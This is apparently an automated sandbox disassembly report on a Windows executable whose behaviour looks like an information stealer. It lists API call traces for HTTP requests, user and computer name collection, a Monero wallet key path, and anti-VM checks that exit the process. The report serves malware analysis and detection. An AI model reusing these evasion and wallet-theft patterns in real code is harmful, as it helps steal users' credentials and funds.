                            • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                            • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003956A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395857
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 003952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 0039532F
                            • Part of subcall function 003952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 00395383
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 003953AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0039578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00395A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$PX
                          • API String ID: 507064821-99763959
                          • Opcode ID: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                          • Instruction ID: 2960518bf6c2880505fcc4c67a64aaca3d9fbfc4db0db7590fa2eb74dbc8b190
                          • Opcode Fuzzy Hash: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                          • Instruction Fuzzy Hash: F4E13072910A089ADF16FBB0DC97EED777CAF54300F408668B4066A091EF346A4DDBD2
                          Function 00386280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1244 386280-38630b call 39a7a0 call 3847b0 call 39a740 InternetOpenA StrCmpCA 1251 38630d 1244->1251 1252 386314-386318 1244->1252 1251->1252 1253 386509-386525 call 39a7a0 call 39a800 * 2 1252->1253 1254 38631e-386342 InternetConnectA 1252->1254 1273 386528-38652d 1253->1273 1256 386348-38634c 1254->1256 1257 3864ff-386503 InternetCloseHandle 1254->1257 1259 38635a 1256->1259 1260 38634e-386358 1256->1260 1257->1253 1262 386364-386392 HttpOpenRequestA 1259->1262 1260->1262 1264 386398-38639c 1262->1264 1265 3864f5-3864f9 InternetCloseHandle 1262->1265 1267 38639e-3863bf InternetSetOptionA 1264->1267 1268 3863c5-386405 HttpSendRequestA HttpQueryInfoA 1264->1268 1265->1257 1267->1268 1270 38642c-38644b call 398940 1268->1270 1271 386407-386427 call 39a740 call 39a800 * 2 1268->1271 1278 3864c9-3864e9 call 39a740 call 39a800 * 2 1270->1278 1279 38644d-386454 1270->1279 1271->1273 1278->1273 1282 386456-386480 InternetReadFile 1279->1282 1283 3864c7-3864ef InternetCloseHandle 1279->1283 1287 38648b 1282->1287 1288 386482-386489 1282->1288 1283->1265 1287->1283 1288->1287 1291 38648d-3864c5 call 39a9b0 call 39a8a0 call 39a800 1288->1291 1291->1282
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003863FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0038646D
                          • InternetCloseHandle.WININET(00000000), ref: 003864EF
                          • InternetCloseHandle.WININET(00000000), ref: 003864F9
                          • InternetCloseHandle.WININET(00000000), ref: 00386503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                          • Instruction ID: 09556aedb75f6a886fd4a2da66488018361f6e102fd6a5948261133a35a7eca2
                          • Opcode Fuzzy Hash: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                          • Instruction Fuzzy Hash: 5D714E71A00318ABDF15EBA0CC4AFEE77B8FB44704F104198F10A6B190DBB46A89DF91
                          Function 003917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 3917a0-3917cd call 39aad0 StrCmpCA 1304 3917cf-3917d1 ExitProcess 1301->1304 1305 3917d7-3917f1 call 39aad0 1301->1305 1309 3917f4-3917f8 1305->1309 1310 3917fe-391811 1309->1310 1311 3919c2-3919cd call 39a800 1309->1311 1313 39199e-3919bd 1310->1313 1314 391817-39181a 1310->1314 1313->1309 1316 39185d-39186e StrCmpCA 1314->1316 1317 39187f-391890 StrCmpCA 1314->1317 1318 3918f1-391902 StrCmpCA 1314->1318 1319 391951-391962 StrCmpCA 1314->1319 1320 391970-391981 StrCmpCA 1314->1320 1321 391913-391924 StrCmpCA 1314->1321 1322 391932-391943 StrCmpCA 1314->1322 1323 391835-391844 call 39a820 1314->1323 1324 391849-391858 call 39a820 1314->1324 1325 3918ad-3918be StrCmpCA 1314->1325 1326 3918cf-3918e0 StrCmpCA 1314->1326 1327 39198f-391999 call 39a820 1314->1327 1328 391821-391830 call 39a820 1314->1328 1330 39187a 1316->1330 1331 391870-391873 1316->1331 1332 39189e-3918a1 1317->1332 1333 391892-39189c 1317->1333 1338 39190e 1318->1338 1339 391904-391907 1318->1339 1344 39196e 1319->1344 1345 391964-391967 1319->1345 1347 39198d 1320->1347 1348 391983-391986 1320->1348 1340 391930 1321->1340 1341 391926-391929 1321->1341 1342 39194f 1322->1342 1343 391945-391948 1322->1343 1323->1313 1324->1313 1334 3918ca 1325->1334 1335 3918c0-3918c3 1325->1335 1336 3918ec 1326->1336 1337 3918e2-3918e5 1326->1337 1327->1313 1328->1313 1330->1313 1331->1330 1353 3918a8 1332->1353 1333->1353 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1353->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 003917C5
                          • ExitProcess.KERNEL32 ref: 003917D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 45362a159ce7b8b07bcdae3b719556a16a4fc536f2b56e5ff6b7b784dd0e47b4
                          • Instruction ID: 03ec4cd21dd437ab464e0d6acc18068aa7674c7eb7794b1445c382318068ef74
                          • Opcode Fuzzy Hash: 45362a159ce7b8b07bcdae3b719556a16a4fc536f2b56e5ff6b7b784dd0e47b4
                          • Instruction Fuzzy Hash: 78512AB5A1420AEFDF06DFA0D954ABE7BB9BF44704F108048E406BB240D771ED55DBA2
                          Function 00397500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 397500-39754a GetWindowsDirectoryA 1357 39754c 1356->1357 1358 397553-3975c7 GetVolumeInformationA call 398d00 * 3 1356->1358 1357->1358 1365 3975d8-3975df 1358->1365 1366 3975fc-397617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 3975e1-3975fa call 398d00 1365->1367 1368 397619-397626 call 39a740 1366->1368 1369 397628-397658 wsprintfA call 39a740 1366->1369 1367->1365 1377 39767e-39768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00397542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0039760A
                          • wsprintfA.USER32 ref: 00397640
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$:
                          • API String ID: 1544550907-1412321837
                          • Opcode ID: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                          • Instruction ID: 61c188e0507cf1b58587fabe839c859a9a09381a3f544cb2e4be1d17dd3b4d98
                          • Opcode Fuzzy Hash: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                          • Instruction Fuzzy Hash: 1041C2B1D04248ABDF11DF94CC45FEEBBB8EF18704F100198F509AB280D7786A48CBA5
                          Function 003969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324E8), ref: 003998A1
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 003998BA
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32248), ref: 003998D2
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324A0), ref: 003998EA
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E322F0), ref: 00399903
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E38F68), ref: 0039991B
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E258D0), ref: 00399933
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E258B0), ref: 0039994C
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32470), ref: 00399964
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32260), ref: 0039997C
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324D0), ref: 00399995
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32500), ref: 003999AD
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 003999C5
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32278), ref: 003999DE
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 003811D0: ExitProcess.KERNEL32 ref: 00381211
                            • Part of subcall function 00381160: GetSystemInfo.KERNEL32(?), ref: 0038116A
                            • Part of subcall function 00381160: ExitProcess.KERNEL32 ref: 0038117E
                            • Part of subcall function 00381110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                            • Part of subcall function 00381110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                            • Part of subcall function 00381110: ExitProcess.KERNEL32 ref: 00381143
                            • Part of subcall function 00381220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                            • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381258
                            • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381266
                            • Part of subcall function 00381220: ExitProcess.KERNEL32 ref: 00381294
                            • Part of subcall function 00396770: GetUserDefaultLangID.KERNEL32 ref: 00396774
                            • Part of subcall function 00381190: ExitProcess.KERNEL32 ref: 003811C6
                            • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                          • Sleep.KERNEL32(00001770), ref: 00396B04
                          • CloseHandle.KERNEL32(?,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                          • ExitProcess.KERNEL32 ref: 00396B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                          • Instruction ID: 6b975b890f711220085b75eb5934f116fec582bc0825cb981adddc13a7922dc3
                          • Opcode Fuzzy Hash: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                          • Instruction Fuzzy Hash: 99310971914609AADF06FBF0DC5BFEE7B78AF14740F104618F202AA192EF706905D7A2
                          Function 00381220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 381220-381247 call 3989b0 GlobalMemoryStatusEx 1439 381249-381271 call 39da00 * 2 1436->1439 1440 381273-38127a 1436->1440 1442 381281-381285 1439->1442 1440->1442 1444 38129a-38129d 1442->1444 1445 381287 1442->1445 1447 381289-381290 1445->1447 1448 381292-381294 ExitProcess 1445->1448 1447->1444 1447->1448
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                          • __aulldiv.LIBCMT ref: 00381258
                          • __aulldiv.LIBCMT ref: 00381266
                          • ExitProcess.KERNEL32 ref: 00381294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                          • Instruction ID: ce109f179e5ec50dfda1f623d6167f2db447040788b458c7ffd1962a41807aca
                          • Opcode Fuzzy Hash: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                          • Instruction Fuzzy Hash: 0E011DB0D44308BAEF11EBE4DC4AF9EBB7CAB14705F208488F705BA2C0D7B455468799
                          Function 00396AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 396af3 1451 396b0a 1450->1451 1453 396aba-396ad7 call 39aad0 OpenEventA 1451->1453 1454 396b0c-396b22 call 396920 call 395b10 CloseHandle ExitProcess 1451->1454 1459 396ad9-396af1 call 39aad0 CreateEventA 1453->1459 1460 396af5-396b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                          • Sleep.KERNEL32(00001770), ref: 00396B04
                          • CloseHandle.KERNEL32(?,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                          • ExitProcess.KERNEL32 ref: 00396B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
